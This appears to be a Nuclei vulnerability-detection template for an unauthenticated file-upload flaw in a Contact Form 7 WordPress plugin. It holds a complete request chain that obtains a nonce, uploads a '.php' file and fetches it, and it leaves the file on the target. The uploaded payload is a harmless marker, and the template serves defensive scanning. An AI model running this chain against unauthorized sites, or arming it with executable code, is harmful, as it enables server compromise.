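id: CVE-2026-5718

info:
  name: Drag and Drop Multiple File Upload - CF7 <= 1.3.9.6 - Remote Code Execution
  author: zer0p0int
  severity: critical
  description: |
    Drag and Drop Multiple File Upload for Contact Form 7 WordPress plugin <= 1.3.9.6 contains an unrestricted file upload caused by insufficient file type validation and bypass of filename sanitization with non-ASCII characters, letting unauthenticated attackers upload arbitrary files and achieve remote code execution.
  impact: |
    Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.
  remediation: |
    Update to the latest version beyond 1.3.9.6.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-5718
    - https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-5718
    epss-score: 0.04249
    epss-percentile: 0.89047
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 5
    vendor: codedropz
    product: drag-and-drop-multiple-file-upload-contact-form-7
    publicwww-query: "/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/"
  # "intrusive": step 3 writes a file into the target's uploads directory and
  # nothing in this template removes it afterwards.
  tags: cve,cve2026,wordpress,wp-plugin,file-upload,rce,intrusive,unauth,vkev

variables:
  # Marker written into the uploaded file and searched for in the final GET.
  # It contains no PHP tags, so the response body is the same whether or not
  # the server executes the file.
  string: "{{randstr}}"
  # Random 6-letter lower-case basename; the ".php" suffix is appended in the
  # multipart part below.
  filename: "{{to_lower(rand_text_alpha(6))}}"

# Every step depends on values extracted by the previous one
# (form_id -> nonce -> renamed/path), so the chain stops at the first failure.
flow: http(1) && http(2) && http(3) && http(4)

http:
  # Step 1: locate a Contact Form 7 form and pull its numeric form id.
  - method: GET
    path:
      - "{{BaseURL}}/"
      - "{{BaseURL}}/contact"
      - "{{BaseURL}}/contact-us"

    stop-at-first-match: true
    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "_wpcf7")'
        internal: true
        condition: and

    extractors:
      - type: regex
        name: form_id
        group: 1
        part: body
        regex:
          - '_wpcf7"(?:[^>]*value="|:)(\d+)'
        internal: true

  # Step 2: obtain the CF7 nonce that the upload handler checks in "security".
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=_wpcf7_check_nonce

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "\"data\"")'
        internal: true
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        part: body
        regex:
          - '"data":"([a-f0-9]+)"'
        internal: true

  # Step 3: upload a ".php"-named file through the plugin's AJAX handler.
  # NOTE(review): the filename is plain ASCII, so the non-ASCII
  # filename-sanitization bypass mentioned in the description is not exercised;
  # builds that block ASCII ".php" but remain bypassable may not be flagged.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------cf7dndboundary

        -----------------------------cf7dndboundary
        Content-Disposition: form-data; name="action"

        dnd_codedropz_upload
        -----------------------------cf7dndboundary
        Content-Disposition: form-data; name="security"

        {{nonce}}
        -----------------------------cf7dndboundary
        Content-Disposition: form-data; name="form_id"

        {{form_id}}
        -----------------------------cf7dndboundary
        Content-Disposition: form-data; name="upload_name"

        upload-file
        -----------------------------cf7dndboundary
        Content-Disposition: form-data; name="upload-file"; filename="{{filename}}.php"
        Content-Type: application/octet-stream

        {{string}}
        -----------------------------cf7dndboundary--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"success\":true", "\"file\"")'
        internal: true
        condition: and

    # The handler reports the stored name and sub-directory; both are
    # server-supplied and are used verbatim to build the verification URL.
    extractors:
      - type: regex
        name: renamed
        group: 1
        part: body
        regex:
          - '"file":"([^"]+)"'
        internal: true

      - type: regex
        name: path
        group: 1
        part: body
        regex:
          - '"path":"([^"]+)"'
        internal: true

  # Step 4: confirm the uploaded file is publicly retrievable.
  # This proves arbitrary-extension upload plus web exposure; it does not by
  # itself prove PHP execution, since the marker has no PHP tags and a static
  # serve would match too. Execution is inferred, not observed.
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/wp_dndcf7_uploads/{{path}}/{{renamed}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, string)'
        condition: and
# NOTE(review): the digest below signs the template body; it no longer matches
# once the file is edited and must be regenerated with the project's signing
# tooling before distribution.
# digest: 490a0046304402205b1cca07cfc4b32465cc4091ad50cf728bf567c89bcdf2dc212123c66f90b37d022053412c0afdbe7cd4b8f60901c1517a8f79fc1b8c846f73454bf1d7c990710dbf:922c64590222798bb761d5b6d8e72950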